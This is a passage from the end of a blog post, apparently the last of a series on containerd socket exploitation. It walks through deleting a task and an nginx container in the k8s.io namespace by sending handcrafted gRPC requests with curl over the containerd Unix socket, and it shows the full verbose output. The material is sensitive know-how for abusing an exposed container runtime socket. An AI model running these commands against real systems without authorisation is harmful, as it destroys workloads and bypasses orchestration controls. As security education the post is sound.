$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Delete --data-binary @deletetaskrequest.bin --output deletetaskresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x558c57df29f0)
> POST /containerd.services.tasks.v1.Tasks/Delete HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [22 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Delete the container
Finally, we need to delete the container. This uses the /containerd.services.containers.v1.Containers/Delete
service with the DeleteContainerRequest
message. The DeleteContainerRequest
message looks like the following:
* DeleteContainerRequest
Fields:
id - string
Rough JSON example (might need tweaking):
{
"id": "string"
}
We create the message to delete our nginx
container like so:
$ cat deletecontainerrequest.json
{"id":"nginx"}
$ ./protobuf_parser.py -m containers_pb2.py -i deletecontainerrequest.json -o deletecontainerrequest.bin -t DeleteContainerRequest
Written to deletecontainerrequest.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.containers.v1.Containers/Delete --data-binary @deletecontainerrequest.bin --output deletecontainerresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5605d94319f0)
> POST /containerd.services.containers.v1.Containers/Delete HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now our container is deleted.
That completes my series of posts on containerd socket exploitation, I hope you found it useful and interesting.